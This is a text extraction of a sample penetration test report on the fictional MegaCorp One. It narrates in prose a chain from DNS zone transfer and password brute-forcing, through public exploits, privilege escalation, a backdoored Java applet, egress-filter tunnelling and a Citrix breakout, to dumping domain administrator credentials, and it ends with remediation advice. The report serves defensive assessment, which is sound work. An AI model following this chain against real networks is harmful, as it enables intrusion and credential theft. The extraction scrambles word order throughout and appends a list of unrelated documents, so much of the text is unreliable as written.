sample penetration testing report

Transcript

1 Penetration Test Report MegaCorp One th 2013 August 10 , Offensive Security Services, LLC 19706 One Norman Blvd. Suite B #253 Cornelius , NC 28031 United States of America Tel: 1 - 402 - 608 - 1337 Fax: 1 - 704 - 625 - 3787 Email: [email protected] Web: http://www.offensive - security.com

2 R EPORT – M EGA C ORP O NE EST T ENETRATION P Table of Contents Executive Summary 1 Summary of Results 2 3 Attack Narrative 3 Remote System Discovery 6 Admin Webserver Interface Compromise Interactive Shell to Admin Server 9 Administrative Privilege Escalation 12 Java Client Attacks 13 Escalation to Local Administrator 15 16 Deep Packet Inspection Bypass Citrix Environment Compromise 20 Escalation to Domain Administrator 24 Conclusion 28 Recommendations 29 Risk Rating 30 Appendix A: Vulnerability Detail and Mitigation 31 Risk Rating Scale 31 Default or Weak Credentials 31 32 Password Reuse Shared Local Administrator Password 32 Patch Management 33 33 DNS Zone Transfer Default Apache Files 33 Appendix B: About Offensive Security 34 i - 20130513 Copyri ght © 2013 PTR Offensi ve Se curi ty Se rvi ces LLC . All rights rese rve d. Pa ge

3 O T EST R EPORT – M EGA C ORP ENETRATION NE P Executive Summary in order to to conduct a penetration test Offensive Security was contracted by MegaCorp One . s exposure to a targeted attack it determine conducted in a manner that simulated a activities were All malicious actor engaged in a targeted attack against MegaCorp One with the goals of: Identifying if a remote attacker could penetrate o ’s defenses MegaCorp One o Determining the impact of a security breach on: o Confidentiality of the company’s private data Internal infrastructure and availability of MegaCorp One’s information systems o ould allow a c of security weaknesses that Efforts were placed on the identification and exploitation gain unauthorized access to organizational data. remote attacker to The attacks were conducted with The assessment was conducted in the level of access that a general Internet user would have. 1 accordance with the recommendations outlined in NIST SP 800 with all tests an 115 d actions being - conducted under controlled conditions. 1 http://csrc.nist.gov/publications/nistpubs/800 115.pdf - 115/SP800 - Se rvi ces LLC 34 - 20130513 Copyri ght © 2013 Offensi ve Se curi ty PTR . All rights rese rve d. Pa ge 1 of

4 M T EST R EPORT – ENETRATION EGA C ORP O NE P Summary of Results a misconfigured DNS resulted in the discover y of Initial reconnaissance of the MegaCorp One network The results provided server that allowed a DNS zone transfer. us with a listing of specific hosts to target password a revealed protected - administrative for this assessment . An examination of these hosts interface ’s webserver . After creating a custom wordlist using terms identified on the MegaCorp One force. - brute interface by uncovering the password via access to this gain website we were able to An examination of the vulnerable to a remote code interface revealed that it was administrative , which was used to obtain interactive access to the underlying oper ating system. injection vulnerability This i nitial compromise was escalated to administrative access due to a lack of appropriate system , updates on the webserver. After a closer examination the compromised webserver we discovered that J a utilizes for which gave , added a malicious payload to this applet We ers. administrative us ava applet One’s administrators. MegaCorp us interactive access to workstations used by a recovered from it, we were webserver pivot point along with passwords Using the compromised as able to target Local Administrator access to internal resources. This resulted in ously inaccessible previ internal Windows hosts , numerous of a Citrix server, and full administrative complete compromise control of the Windows Active Directory infrastructure. Existing network traffic controls were bypassed through encapsulation of malicious traffic into allowed protocols. Se rvi ces LLC 34 - 20130513 Copyri ght © 2013 Offensi ve Se curi ty PTR . All rights rese rve d. Pa ge 2 of

5 EGA T EST R EPORT – M ENETRATION C ORP O NE P Attack Narrative Remote System Discovery assessment, MegaCorp One provided minimal information outside of the For the purposes of this megacorpone organizational domain name: was .com. The intent to closely simulate an adversary ll , a without any internal information. To avoid targeting systems that were not owned by MegaCorp One assets identified . were conducted attacks any verification before ownership for submitted were identify the potential attack surface, we examined the name servers of the In an attempt to ( megacorpone.com domain name Figure 1 ) . Information gathering for megacorpone.com reveals three active name servers. – 1 Figure found that transfer. We attempted to conduct a zone servers identified, With the name we ns2.megacorpone.com . This provided us misconfiguration was vulnerable to a full DNS zone transfer the s and associated IP addresses , which could be used to further target with a listing of hostname . organization Figure ( 2 ) Zone transfers can provide attackers with detailed information about the It can also leak information about the network ranges owned by the pabilities of the organization. ca nformation. Please see Appendix A for more i organization. Se rvi ces LLC 34 - 20130513 Copyri ght © 2013 Offensi ve Se curi ty PTR . All rights rese rve d. Pa ge 3 of

6 M ENETRATION T EST R EPORT – P EGA C ORP O NE . ransfer t one z DNS A misconfigured name server allows a full and unrestricted – 2 Figure was that the , which verified for verification The list of identified hosts MegaCorp One submitted to then entire in the assessment be included should range network 50.7.67.x scope. These systems were to determine enumerate any running services . All identified services were examined in detail scanned to their potential exposure to a targeted attack. Se rvi ces LLC - 20130513 Copyri ght © 2013 Offensi ve Se curi ty PTR . All rights rese rve d. Pa ge 4 of 34

7 ORP T EST R EPORT – M EGA C ENETRATION O NE P Through a combination of DNS enumeration techniques and network scanning, we were able to build a MegaCorp One’s network. composite that we feel reflects below The target network is shown Figure 3 in Additional details regarding controls such as deep packet . inspection were discovered later in the assessment but are included here for completeness. Figure 3 Target Network - Offensi ve Se curi ty of Pa ge . All rights rese rve d. Se rvi ces LLC 34 Copyri ght © 2013 20130513 - PTR 5

8 ENETRATION T EST R EPORT – M EGA C ORP O NE P Admin Webserver Interface Compromise admin.megacorpone.com an Apache webserver on port 81. to be running found webserver was T he this site Accessing the root URL of a quick next conducted We resulted in the display of a blank page. ( enumeration scan of the system looking for common directories and files . Figure 4 ) 4 Figure partially discloses the older structure. f webserver’s admin.megacorpone.com host Enumeration of the – The scan results revealed that along with common Apache default files (Please see Appendix A for more ( that was only accessible after authentication. ” directory dmin a / “ an identified information), we Figure . ) 5 Access to the “admin” folder is password – protected. 5 Figure - Se rvi ces LLC 34 - 20130513 Copyri ght © 2013 Offensi ve Se curi ty PTR . All rights rese rve d. Pa ge 6 of

9 M T EST R EPORT – ENETRATION EGA C ORP O NE P le custom dictionary fi we compiled a , force attempt against this system - targeted brute To prepare a www.megacorpone.com content o f the based on the website. The initial dictionary consisted of 331 then , which were custom words s to put through several rounds of permutation and substitution s of 16,201 words. This dictionary file was used along with the username file tionary produce a final dic ” against th admin “ protected section of the site. e 6 – Using a custom word dictionary it is possible to discover the administrative password for the “admin” folder. Figure This brute - force attack uncovered a password of “nanotechnology1” for the admin user. We were able to leverage these credentials to successfully gain unauthorized access to the protected portion of the 6 website ( Figure ) . Please see Appendix A for more information on the exploited vulnerability. Figure ( interface ger web a an M , which ) 7 The administrative portion of the website contained the SQLite what appeared to be Utilizing this interface, we found was accessible without any additional credentials . 2 . the database that supported an instance of phpSQL ite CMS SQLite Manager is found to be running on the compromised webserver. Figure – An instance of 7 2 http://phps ql i tecms .net/ Se rvi ces LLC 34 - 20130513 Copyri ght © 2013 Offensi ve Se curi ty PTR . All rights rese rve d. Pa ge 7 of

10 M T EST R EPORT – ENETRATION EGA C ORP O NE P with extract a list of users on the system the ability to the data and to access direct The interface gave us password hash values ( Figure 8 ) . the associated Figure 8 – Lack of additional access controls allows an attacker to retrieve usernames and password hashes from the “userdata” database. es we found that the hash did not conform to any standard format. After examination of the values, how exactly examined the source code to determine , we software ” phpselitecms a copy of the “ Using identify the function responsible for this value is produced. Through this process we were able to hashing of the account passwords . eneration ash h assword ds to the discovery of the p g algorithm. Figure 9 – Source code review lea acquired knowledge of the password hashing format and the use of a randomly newly With the - salt ed generated 10 character salt value, we were able to easily convert the recovered hashes into their attack. SHA1 equivalent and brute - force conduct a This effort resulted in the recovery of two plaintext passwords . Although these values were not - used on other systems hope that may have be en they re immediately useful, they were retained in with in the organization. Se rvi ces LLC 34 - 20130513 Copyri ght © 2013 Offensi ve Se curi ty PTR . All rights rese rve d. Pa ge 8 of

11 ENETRATION T EST R EPORT – M EGA C ORP O NE P Interactive Shell to Admin Server a - well a was found to be vulnerable to ger software code Man known The previously discovered SQLite 3 access shell Successful exploitation of this vulnerability results in . injection vulnerability to the public exploit, we were able to modified underlying system in the context of the webserver user . Using a obtain megacorpone admin. interactive access to the limited .com webserver. Please see Appendix A for more information. A publicly available – xploit 10 Figure is used to gain unauthorized access on the SQLite e admin.megacorpone.com host. 3 db.com/exploits/24320/ - http://www.exploit Se rvi ces LLC 34 - 20130513 Copyri ght © 2013 Offensi ve Se curi ty PTR . All rights rese rve d. Pa ge 9 of

12 M ENETRATION T EST R EPORT – P EGA C ORP O NE data user. - Control of the vulnerable server is limited to the context of the www – 11 Figure than the one The public version of the exploit t argets a slightly different version of the SQLite Manager . deployed by MegaCorp One the deployed version of the software is vulnerable to the same Although underlying issues We . were able to extend cation does not successfully run without modifi the exploit , the it for the updated version. A copy of customize exploit to support HTTP authentication and original this updated exploit will be provided separately from this report. . 12 Figure sualized in vi best The extent of compromise at this point can be Se rvi ces LLC 10 - 20130513 Copyri ght © 2013 Offensi ve Se curi ty PTR . All rights rese rve d. 34 of Pa ge

13 M ENETRATION T EST R EPORT – P EGA C ORP O NE - 12 Figure Web Server Compromise Se rvi ces LLC . All rights rese rve d. Pa ge 11 of 34 Offensi ve Se curi ty Copyri ght © 2013 20130513 - PTR

14 EGA T EST R EPORT – M ENETRATION C ORP O NE P Administrative Privilege Escalation istrative the admin With interactive access to the underlying operating system server obtained, web of to we continued with the examination of the system searching for ways privileges the escala te to 4 , ble to a local privilege escalation exploit administrative level. We found that the system was vulnera we were able to utilize successfully. Please see Appendix A for more information. which 13 Figure exploit is used to take advantage of an scalation e rivilege A local p – - level access. unpatched host and gain root partially The use of this exploit was made possible due to the inclusion of developer tools on the to vulnerable system. If these tools were not present on the system, it woul d have still been possible successfully exploit although the difficulty . been increased would have in doing so , , the webserver represents an internal attack platform for a malicious party. current configuration its In system With the ability to gain full admi nistrative access, a malicious party could utilize th is vulnerable for a multitude of purposes, ranging from attacks against MegaCorp One itself, to attacks against its customers. both purposes I . t’s highly likely that the attackers would leverage this system for 4 db.com/ex - http://www.exploit ploits/18411/ Se rvi ces LLC 34 - 20130513 Copyri ght © 2013 Offensi ve Se curi ty PTR . All rights rese rve d. Pa ge 12 of

15 EGA T EST R EPORT – M ENETRATION C ORP O NE P Java Client Attacks , administrative access to the system we conducted an analysis of the exploited system. This Using the e web d iscovery of a private section of th resulted in the site that serves a Java applet only to specific in question management network for workstations . This network range was later discovered to be the MegaCorp One. 14 Figure reveal an additional subnet on the compromised network. ules r taccess H - on the system, we found that th Through examination of the log files and the J ava applet present e functionality MegaCorp One. This was of internal users administrative a subset of to applet provided advantageous to us as attackers, as it provided us with a potential path to internal systems that other wise were not easily accessible. added an additional obtaining permission from MegaCorp One, we Upon applet downloaded by to be trusted applet, allow it to run, and clients. The theory of this attack was that clients would access the hosts t This is a derivative of a common social . provide us with direc client access to additional into running a malicious applet. In this case in which the victim is manipulated engineering attack trusted. no effort was required to however the victim as the applet is already regarded as mislead , client system. an additional This attack worked as intended, providing us with access to Se rvi ces LLC 34 - 20130513 Copyri ght © 2013 Offensi ve Se curi ty PTR . All rights rese rve d. Pa ge 13 of

16 M ENETRATION T EST R EPORT – P EGA C ORP O NE exploit a host on Using a malicious java applet it is possible to – 15 Figure the management subnet. access to systems in the management network as indicated With this compromise in place, we obtained in Figure 16 . 16 Figure compromises the MegaCorp One management subnet. ttack a pplet a ava Successful j – Se rvi ces LLC 14 - 20130513 Copyri ght © 2013 Offensi ve Se curi ty PTR . All rights rese rve d. 34 of Pa ge

17 C T EST R EPORT – M EGA ENETRATION ORP O NE P Local Administrator to Escalation was limited to the level of a The access provided by the Java applet attack standard use r . To maximize the impact of the compromise we wanted to escalate access to the level of D omain A dministrator. As t accomplish this, we to to obtain local administrative access. In an effort step, we needed he first examined the compromised system to identify how it could be leveraged. found a Group Policy Preferences file that allowed us to on the system Using this approach we decrypt 5 6 Please see Appendix A for more information. local administrative password the . ile f roups.xml G Using the newly gained access it is possible to retrieve the – 17 Figure from a domain controller. 5 - us/library/cc422924.aspx http://msdn.microsoft.com/en 6 - policy - preferences http://blogs.technet.com/b/grouppolicy/archive/2009/04/22/passwords - in - group - updated.aspx Se rvi ces LLC 34 - 20130513 Copyri ght © 2013 Offensi ve Se curi ty PTR . All rights rese rve d. Pa ge 15 of

18 EGA T EST R EPORT – M ENETRATION C ORP O NE P Encrypted local administrator password is found in the – 18 Figure Groups.xml file. Figure 19 – Using the encryption key published by Microsoft, the encrypted password is easily decrypted. Using the recovered plaintext password, we were able to gain local administrative access to the compromised client. Deep Packet Inspection Bypass we encountered , system While trying to establish additional layers of access into the compromised egress filtering. This was first encountered while trying to establish an encrypted outbound aggressive tunnel for the Microsoft Remote Desktop Protocol . Figure 20 – Initial attempts to establish an outboun d tunnel for RDP were blocked by the egress filtering systems. er the attack connect to to attempted network protocol enforcement as we Additionally , we discovered ssion to this, we created a tunnel within the existing meterpreter se SSH server on port 80. To bypass allow us to access Windows file sharing from the attacker system. This was utilized to run a windows in command shell on the compromised host as the local administrative user. With this shell, we executed n a meterpreter payload. additional Se rvi ces LLC 34 - 20130513 Copyri ght © 2013 Offensi ve Se curi ty PTR . All rights rese rve d. Pa ge 16 of

19 ENETRATION T EST R EPORT – P M EGA C ORP O NE Port forwarding through the initial meterpreter session is established in order to achieve direct access to the Figur e 21 – compromised management host. Newly established connection is used to – gain an administrative shell on the compromised management host. Figure 22 Figure is used to establish a meterpreter shell on host 10.7.0.22. ccess a Local Administrator - 23 20130513 34 of 17 Pa ge PTR . All rights rese rve d. Se rvi ces LLC Offensi ve Se curi ty Copyri ght © 2013 -

20 EGA T EST R EPORT – M ENETRATION C ORP O NE P 7 , the new meterpreter shell in place an open source utility Tunnel, - With that , we then utilized HTTP “ . We used the within the HTTP payload newly established encapsulates arbitrary traffic http tunnel ” to encapsulate a remote desktop connection between the attacker and compromised client . This allowed was graphical access to the compromised client system. remote desktop session The us to obtain full using the password for user “ established from the used - discovered to be re ”, which was mike c ompromised SQLite Manager application . Please see Appendix A for more information. access is established by encapsulating the previously filtered protocol through a http tunnel. Figure 24 - Remote Desktop was At this point, the external perimeter of the MegaCorp One ne shown in as compromised fully twork computer within the MegaCorp One trusted ’s Figure 25 . The virtual equivalent of console access to a ha indows network access to the W environment d been obtain ed . It should be noted that the current privileged non domain user account and a local administrator account. - limited to a was 7 tunnel.sourceforge.net/ - http://http Se rvi ces LLC 34 - 20130513 Copyri ght © 2013 Offensi ve Se curi ty PTR . All rights rese rve d. Pa ge 18 of

21 M ENETRATION T EST R EPORT – P EGA C ORP O NE Compromise of the MegaCorp One network has reached into the – 25 Figure network management subnet. Se rvi ces LLC Pa ge of 34 . All rights rese rve d. 19 Offensi ve Se curi ty 20130513 - PTR Copyri ght © 2013

22 O T EST R EPORT – M EGA C ORP ENETRATION NE P Citrix Environment Compromise of search in to the internal network, we proceeded to explore the network Using remote desktop access homepage the One such target appeared to be a Citrix server, which was set as high value targets. on the compromised host . Using the same credentials that were utilized to establish the emote desktop r we were able to successfully login to this Citrix environment. , connection on the MegaCorp One network. Internet Explorer was discovered server offering only Citrix Figure 26 – A as the only available application exposed “Internet Explorer” Citrix environment This commonly This is a . m of the Citrix by many organizations to limit access to the underlying operating syste utilized method configuration e It is important to not server. many methods exist to bypass this that . In this case, we window owershell P to create a batch file that would provide us with a dialog “Save” utilized the interface. e” dialog operates in much the same manner as a standard “Windows This is possible as the “Sav Explorer” file management window. Se rvi ces LLC 34 - 20130513 Copyri ght © 2013 Offensi ve Se curi ty PTR . All rights rese rve d. Pa ge 20 of

23 EGA T EST R EPORT – M ENETRATION C ORP O NE P 27 , it is possible to bypass the some restrictions imposed by the Citrix ialog d ave Using the S – Figure environment. – 28 Figure A batch file invoking the Powershell application is created on the Citrix server. Offensi ve Se curi ty of 21 . All rights rese rve d. Se rvi ces LLC 34 Copyri ght © 2013 20130513 - PTR Pa ge

24 O ENETRATION T EST R EPORT – M EGA C ORP P NE restriction is bypassed resulting in the execution of the Powershell. Citrix – 29 Figure payload malicious was then utilized to download a The ability to use Powershell would provide us , which session to the underlying Citrix server. with a meterpreter 30 Figure - ces, including remote internet user to retrieve files from arbitrary sour - functionality allows an end Powershell locations. T ability to utilize the “Save” dialog to run arbitrary executable programs was combined with the he us to execute programs in the context of allowing previously discovered local administrator password inistrator. This allowed us to gain full administrative control of the Citrix system. the local adm Please see Appendix A for more information. Se rvi ces LLC 34 - 20130513 Copyri ght © 2013 Offensi ve Se curi ty PTR . All rights rese rve d. Pa ge 22 of

25 EGA T EST R EPORT – M ENETRATION C ORP O NE P Password re use allows the attackers to execute a m – executable with alicious - Figure 31 administra tive privileges. Figure server is achieved. Citrix Complete compromise of the – 32 Offensi ve Se curi ty of 23 Pa ge . All rights rese rve d. Se rvi ces LLC 34 Copyri ght © 2013 20130513 - PTR

26 M ENETRATION T EST R EPORT – P EGA C ORP O NE An additional host in the network management subnet has been compromised. – 33 Figure Escalation to Domain Administrator attempt to capture passwords from memory. Citrix A With the Citrix server compromised, we made an server is an ideal candidate for this , as for long periods of time without s typically operate it attack vector er of users. a large numb s reboots and service 8 To capture passwords from memory, we utilized the Windows Credential Editor tool due to its ability to . without causing adverse effects run on 64 bit systems 8 http://www.ampliasecurity.com/research/wcefaq.html Se rvi ces LLC - 20130513 Copyri ght © 2013 Offensi ve Se curi ty PTR 34 of 24 Pa ge . All rights rese rve d.

27 NE T EST R EPORT – M EGA C ORP O ENETRATION P Figure 34 – Windows Credentials Editor is used to retrie ve plaintext passwords from the Citrix server. a This reve , including s Please see Windows domain administrator account. a led multiple password In order to validate the newly recovered credentials , we successfully Appendix A for more information. a new remote desktop session d create to the Citrix server using the domain administrator credentials. Offensi ve Se curi ty 34 25 Pa ge . All rights rese rve d. Se rvi ces LLC of Copyri ght © 2013 20130513 - PTR

28 M ENETRATION T EST R EPORT – P EGA C ORP O NE credentials are validated against the Citrix host. Domain Administrator - 35 Figure attacker would have malicious At this point, full control of the Windows domain had been obtained. A multiple tools at their disposal, including: o Utilization of Group Policy to systems. Windows deploy backdoor software on o Complete exfiltration of all data stored on any system that uses Windows authenticat ion. Destruction of any and all network resources. o Targeted attacks against any and all employees of MegaCorp One, through the use of o information gathering tools such as keystroke loggers to identify personal information. Leveraging this systemic access to o conduct attacks against MegaCorp One suppliers and partners that maintain a trust relationship with the company. Se rvi ces LLC Pa ge - 20130513 Copyri ght © 2013 Offensi ve Se curi ty PTR . All rights rese rve d. 34 of 26

29 C T EST R EPORT – M EGA ENETRATION ORP O NE P It was determined that while these steps would be possible, they would be considered outside the scope strated that a total compromise of the MegaCorp One domain of the current engagement. It was demon had been accomplished with a complete loss of integrity for all local systems. 36 Full Domain Compromise - Figure Offensi ve Se curi ty of 27 . All rights rese rve d. Se rvi ces LLC 34 Copyri ght © 2013 20130513 - PTR Pa ge

30 T EST R EPORT – M EGA C ORP O NE ENETRATION P Conclusion suffered a series of con of critical MegaCorp One trol failures , which led to a complete compromise company MegaCorp One have had a dramatic effect on operations if a would . These failures assets malicious party had exploited them. policies concerning password reuse and deployed access Current to mitigate the impact of the discovered vulnerabilities. not adequate are controls The specific goals of the penetration test were stated as: Identifying o if a remote attacker could penetrate MegaCorp One ’s defenses o reach on: the impact of a security b Determining o C onfidentiality of the company’s information nternal infrastructure and availability of ’s information systems MegaCorp One I o p One can result in a r o A targeted attack against MegaC These goals of the penetration test were met. assets. of organizational compromise issues that would typically be considered minor complete Multiple MegaCorp One’s information systems. were leveraged in concert, resulting in a total compromise of the It is important t ecurity infrastructure can be this collapse of the entire MegaCorp One s o note that greatly attributed to insufficient access controls at both the network boundary and host levels . Appropriate efforts should be undertaken to introduce effective network segmentation, which could cading security failures throughout the MegaCorp One infrastructure. help mitigate the effect of cas Se rvi ces LLC 34 - 20130513 Copyri ght © 2013 Offensi ve Se curi ty PTR . All rights rese rve d. Pa ge 28 of

31 ORP T EST R EPORT – M EGA C ENETRATION O NE P Recommendations Due to the impact to the overall organization as uncovered by this penetration test, appropriate accomplished in a timely manner. resources should be allocated to ensure that remediation efforts are While a comprehensive list of items that should be implemented is beyond the scope of this . engagement, some high level items are important to mention Offensive Security recommends the following: in the organization . The compromise of 1. Ensure that strong credent ials are use everywhere MegaCorp One system as drastically impacted by the use of weak passwords as well as the reuse 9 11 NIST SP 800 - of passwords across systems of differing security levels. is recommended for guidel ines on operating an enterprise password policy. While this issue was not widespread , it was still an issue and should be addressed. MegaCorp One within rust b oundaries . Create logical boundaries of trust where appropriate on the internal Establish t 2. the breach k. Each logical trust segment should be able to be compromised without networ unique cascading to other segments. This should include the use of easily administrative accounts so that a compromise d system in one segment cannot be used in other location s. Implement and enforce implementation of change control across all systems : Misconfiguration 3. and insecure deployment issues were discovered across the various systems. The vulnerabilities that arose can be mitigated through the use of change control proc esses on all server systems. 4. : Operating a consistent patch management program Implement a patch management program 10 per the guidelines outlined in NIST SP 800 - 40 is an important component in maintaining good tack surface that results from running unpatched security posture. This will help to limit the at internal services. Conduct regular vulnerability assessments 5. . As part of an effective organizational risk management strategy, vulnerability assessments should be conducted on a regular basis. Doing allow the organization to determine if the installed security controls are properly so will installed, operating as intended, and producing the desired outcome. Please consult NIST SP 11 - 30 800 for guidelines on operating an effective risk management program. 9 sp800 http://csrc.nist.gov/publications/drafts/800 - 118/draft - - 118.pdf 10 - Ver2/SP800 - 40 40v2.pdf - http://csrc.nist.gov/publications/nistpubs/800 11 http://csrc.nist.gov/publications/PubsDrafts.html#SP Rev.%201 - 30 - 800 - Se rvi ces LLC 34 - 20130513 Copyri ght © 2013 Offensi ve Se curi ty PTR . All rights rese rve d. Pa ge 29 of

32 NE T EST R EPORT – M EGA C ORP O ENETRATION P Rating Risk A direct path from High The overall risk identified to . as a result of the penetration test is MegaCorp One system compromise was discovered. external attacker to full It is reasonable to believe that a malicious entity execute a n attack against would be able to successfully through targeted attacks. MegaCorp One Offensi ve Se curi ty 30 Pa ge . All rights rese rve d. Se rvi ces LLC 34 Copyri ght © 2013 20130513 - PTR of

33 O ENETRATION T EST R EPORT – M EGA C ORP P NE Appendix A: Vulnerability Detail and Mitigation Risk Rating Scale vulnerabilities are ranked based upon likelihood and exploited 30, - In accordance with NIST SP 800 rall risk. impact to determine ove Default or Weak Credentials Rating: High protected with a weak An externally exposed administrative interface is only Description: password. forcing techniques, it is possible to - Using common enumeration and brute Impact: retrieve the administrative password for the SQLite Manager web interface. Due to the lack of any additional authentication mechanisms, it is also possible to rd hashes in the underlying database. Successful retrieval retrieve all user passwo of plaintext passwords could allow further compromise of the target exist . environment if password reuse is found to lex password Remediation: s Ensure that all administrative interfaces are protected with comp or passphrases. Avoid use of common or business related words, which could be found or easily constructed with the help of a dictionary. Se rvi ces LLC 34 - 20130513 Copyri ght © 2013 Offensi ve Se curi ty PTR . All rights rese rve d. Pa ge 31 of

34 ORP T EST R EPORT – M EGA C ENETRATION O NE P Password Reuse High Rating: Description: reusing ” was found to be mike MegaCorp One user “ for the SQLite credentials Manager application and his Windows domain access. Impact: Password reuse in general is a practice which should be highly discouraged and prevented to the extend possible. In this case, the impact of the vulnerability is amplified by the fact that an external attacker indirectly compromised a valid set of internal Windows domain credentials. This compromise potentially allows a substantial increase in the attack surface . Update the password management policies to enforce the use of strong, unique, Remediation: ord managers should be passwords for all disparate services. The use of passw encouraged to more easily allow employees to utilize unique passwords across the various systems. hared Local Administrator Password S Rating: High Description: A number of MegaCorp One hosts are provisioned with the same local administrator password. MegaCorp One uses a Group Policy to set a local administrator password on all Impact: hosts within the scope of the GPO. Using the same local administrator password utilize the on corporate systems allows an attacker with appropriate access to - hash” attack vector. It allows an attacker to successfully the well - known “pass - that authenticate on all hosts share the same password, using only the retrieved password hash. As such, the attack does not rely on successful decryption of the the security breach footprint. significantly increases ash and it h It is highly recommended to disable all local administrator accounts. In cases Remediation: where a local administrative account is necessary, it should be assigned a unique lex random password. name and a comp Se rvi ces LLC 34 - 20130513 Copyri ght © 2013 Offensi ve Se curi ty PTR . All rights rese rve d. Pa ge 32 of

35 O EST R EPORT – M EGA C ORP T NE ENETRATION P Patch Management High Rating: Description: MegaCorp One’s external and internal environments contain a number of unpatched systems and application. Impact: A combination of weak authentication and unpatched hosts, which contain known vulnerabilities with publicly available exploits, allows an attacker to gain unauthorized access to a large number of MegaCorp One’s assets. Specifically, discovered instance of SQLite Manager is vulnerable to a remote code execution vulnerability an d the underlying host also contains a local privilege escalation vulnerability, which can easily be leveraged to compromise the externally exposed host entirely. This appears to be an indication of an insufficient patch management policy and its implementa tion. Remediation: All corporate assets should be kept current with latest vendor - supplied security patches. This can be achieved with vendor party - native tools or third - n overview of all missing patches. In many , which can provide a applications party tools can also be used for patch deployment throughout a - , third instances heterogeneous environment. DNS Zone Transfer Rating: Low Description: A misconfigured DNS server allows unrestricted zone transfers. Impact: A DNS server, which is configured to allow zone transfers to any DNS server, can provide sensitive information about corporate assets and network layouts. Remediation: DNS zone transfers should be restricted only to pre approved servers. - Default Apache Files Rating: Low Defaul Description: host. t Apache files were discovered on the admin.megacorpone.com Impact: An attacker may be able to guess the exact version of the running Apache server by inspecting the contents of the default files. Additional sensitive information le may also be availab . Remediation: Remove all default files from publicly accessible web servers. Se rvi ces LLC 34 - 20130513 Copyri ght © 2013 Offensi ve Se curi ty PTR . All rights rese rve d. Pa ge 33 of

36 C T EST R EPORT – M EGA ENETRATION ORP O NE P Appendix B : About Offensive Security Offensive Security advocates penetration testing for impact as opposed to penetration testing for coverage has risen in popularity in recent years as a simplified method coverage. Penetration testing for assessment s used in situations where the goal is to meet regulatory needs. As a form of vulnerability of scanning, penetration testing for coverage includes selective verification of d iscovered issues through the ability exploitation. This allows service providers to conduct the work largely through the use of automated toolsets and maintain consistency of product across multiple engagements. Penetration testing for impact is a form of attack simulation under controlled conditions , which closely to day basis. Penetration - - mimics the real world, targeted attack s that organizations face on a day creates , which assessment based - goal a testing for impact is ventory, more than a simple vulnerability in ue business impact of a breach. ing the tr instead provid based penetration test identifies An impact - areas for improvement that will result in the highest rate of return for the business. Penetration testing for impact poses the challenge of requir ing a high skillset to successfully complete. As demonstrated in this sample report, Offensive Security believes that it is uniquely qualified to deliver due to the level of expertise found , - world class results when conducting penetration tests for impact within our team of sec urity professionals. Offensive S ecurity does not maintain a separate team for penetration testing and other activities that the company is engaged in. This means that the same individuals that are involved in Offensive Security’s indu stry leading performance based training, the - - day creators of 0 Linux, authors of best selling books, Kali production of industry standard tools such as DB are the same individuals that are - and maintainers of industry references such as Exploit exploits, volved in the delivery of services. in Offensive Security offers a product that cannot be matched in the market. However, we may not be the right fit for every job. Offensive Security typically conducts consulting services with a low volume, high skill ratio to allow Offensive Security staff to more closely mimic real world situations. This also allows recognized expertise all while keeping costs re - customers to have increased access to industry asonable. for our services - around engagements are of As such, high volume/ . Offensive ten not a good fit fast turn Security is focused on conducting high quality, high impact assessments and is actively sought out by customers in need of services that cannot be delivered by other vendors. . [email protected] penetration testing needs, please contact us at If you would like to discuss your Se rvi ces LLC 34 - 20130513 Copyri ght © 2013 Offensi ve Se curi ty PTR . All rights rese rve d. Pa ge 34 of

Related documents

The Costs of Decarbonisation: System Costs with High Shares of Nuclear and Renewables

The Costs of Decarbonisation: System Costs with High Shares of Nuclear and Renewables

The Costs of Decarbonisation The Costs of Decarbonisation: System Costs with High : System Costs with High Shares of Nuclear and Renewables Shares of Nuclear and Renewables

More info »
The Costs of Decarbonisation: System Costs with High Shares of Nuclear and Renewables

The Costs of Decarbonisation: System Costs with High Shares of Nuclear and Renewables

The Costs of Decarbonisation The Costs of Decarbonisation: System Costs with High : System Costs with High Shares of Nuclear and Renewables Shares of Nuclear and Renewables

More info »
The Impact of Broadband on the Economy: Research to Date and Policy Issues

The Impact of Broadband on the Economy: Research to Date and Policy Issues

r L egu a tory & market environment International Telecommunication Union L 2012 Telecommunication Development Bureau apri Place des Nations impact of broadband CH-1211 Geneva 20 Switzerland on the ec...

More info »
Nuclear Energy and Renewables: System Effects in Low carbon Electricity Systems

Nuclear Energy and Renewables: System Effects in Low carbon Electricity Systems

Nuclear Development 2012 N uclear Energy and Nuclear Energy and Renewables: System Effects in Low-carbon Electricity Systems Renewables System Effects in Low-carbon Electricity Systems E N A

More info »
Through the Wall Sensors (TTWS) for Law Enforcement: Test & Evaluation (Version 1.2)

Through the Wall Sensors (TTWS) for Law Enforcement: Test & Evaluation (Version 1.2)

The author(s) shown below used Federal funds provided by the U.S. Department of Justice and prepared the following final report: Document Title: Through-the-Wall Sensors (TTWS) for Law Enforcement: Te...

More info »
Measuring the Information Society Report

Measuring the Information Society Report

Internati onal Measuring Telecommunicati on Union the Information Place des Nati ons CH-1211 Geneva 20 Switzerland Society Report ISBN: 978-92-61-21431-9 2016 6 4 0 4 3 3 9 6 1 2 1 4 2 1 9 7 9 8 Print...

More info »
Penetration Testing Guidance v1 1

Penetration Testing Guidance v1 1

Standard: PCI Data Security Standard (PCI DSS) 1.1 Version: September 2017 Date: Group Author : Penetration Test Guidance Special Interest PCI Security Standards Council ent: Info rmation Supplem Pene...

More info »
FY19 Standard Items Package

FY19 Standard Items Package

NAVSEA STANDARD ITEM NUMERICAL INDEX 19 FY - UTILIZATION CATEGORY TITLE DATE ITEM NO. 01 General Criteria; accomplish 009 01 OCT 2017 - I - 02 NOV 2016 009 18 I Report Environmental Compliance for Mat...

More info »
Operational Analysis of the Eastern Interconnection at Very High Renewable Penetrations

Operational Analysis of the Eastern Interconnection at Very High Renewable Penetrations

Operational Analysis of the Eastern Interconnection at Very High Renewable Penetrations Joshua Novacheck, Greg Brinkman, and Gian Porro National Renewable Energy Laboratory Technical Report NREL is a ...

More info »
General

General

General An excellent book on the Buddha's teachings and detailed information on Vipassana meditation. In This Very Life The Liberation Teachings of the Buddha Sayādaw U Pandita (1992) (Serialised with...

More info »
Reuters Institute Digital News Report 2017

Reuters Institute Digital News Report 2017

REUTERS INSTITUTE DIGITAL NEWS REPORT 2017 Reuters Institute Digital News Report 2017

More info »
Digital News Report 2018

Digital News Report 2018

1 Reuters Institute Digital News Report 2018

More info »
C:\fttn\Report\fttn00.wpd

C:\fttn\Report\fttn00.wpd

